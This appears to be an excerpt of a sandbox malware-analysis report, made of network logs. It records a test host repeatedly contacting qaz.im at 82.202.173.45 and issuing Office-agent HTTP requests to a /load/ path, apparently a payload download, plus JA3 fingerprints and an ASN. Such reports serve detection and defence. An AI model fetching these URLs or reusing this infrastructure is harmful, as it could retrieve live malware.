Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49189
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49189
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49189
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49189
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49189
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49189
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49189
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49189
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49189
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49189
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49189
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49190
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49190
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49190
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49190
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49190
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49190
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49190
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49190
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49191
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49191
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49191
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49191
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49191
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49191
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49191
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49191
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49191
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49191
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49191
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49191
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49191
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49192
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49192
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49192
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49192
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49192
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49192
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49192
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49192
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49192
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49192

Source: global traffic	DNS query: name: qaz.im
Source: global traffic	DNS query: name: qaz.im
Source: global traffic	DNS query: name: qaz.im
Source: global traffic	DNS query: name: qaz.im
Source: global traffic	DNS query: name: qaz.im
Source: global traffic	DNS query: name: qaz.im
Source: global traffic	DNS query: name: qaz.im
Source: global traffic	DNS query: name: qaz.im
Source: global traffic	DNS query: name: qaz.im

Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49187 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49187 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49187 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49187 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49187 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49187 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49187 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49187 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49190 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49191 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49192 -> 82.202.173.45:443

Source: global traffic	HTTP traffic detected: GET /load/diy5AH/b6d42680-56fd-4f98-ae0e-ff81e3799df6 HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: qaz.imConnection: Keep-AliveCookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4
Source: global traffic	HTTP traffic detected: GET /load/diy5AH/b6d42680-56fd-4f98-ae0e-ff81e3799df6 HTTP/1.1Accept: /User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: qaz.imConnection: Keep-AliveCookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4
Source: global traffic	HTTP traffic detected: GET /load/diy5AH/b6d42680-56fd-4f98-ae0e-ff81e3799df6 HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: qaz.imConnection: Keep-AliveCookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4
Source: global traffic	HTTP traffic detected: GET /load/diy5AH/b6d42680-56fd-4f98-ae0e-ff81e3799df6 HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: qaz.imConnection: Keep-AliveCookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4

Source: Joe Sandbox View

ASN Name: THEFIRST-ASRU THEFIRST-ASRU

Source: Joe Sandbox View	JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View	JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Source: unknown	HTTPS traffic detected: 82.202.173.45:443 -> 192.168.2.22:49172 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 82.202.173.45:443 -> 192.168.2.22:49173 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 82.202.173.45:443 -> 192.168.2.22:49175 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 82.202.173.45:443 -> 192.168.2.22:49184 version: TLS 1.0

Source: unknown	Network traffic detected: HTTP traffic on port 49185 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49187 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49189
Source: unknown	Network traffic detected: HTTP traffic on port 49183 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49188
Source: unknown	Network traffic detected: HTTP traffic on port 49181 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49187
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49186
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49185
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49184
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49183
Source: unknown	Network traffic detected: HTTP traffic on port 49189 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49182
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49181
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49180
Source: unknown	Network traffic detected: HTTP traffic on port 49172 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49176 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49174 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49191 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49178 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49184 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49179
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49178
Source: unknown	Network traffic detected: HTTP traffic on port 49186 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49177
Source: unknown	Network traffic detected: HTTP traffic on port 49180 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49176
Source: unknown	Network traffic detected: HTTP traffic on port 49182 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49190 -> 443
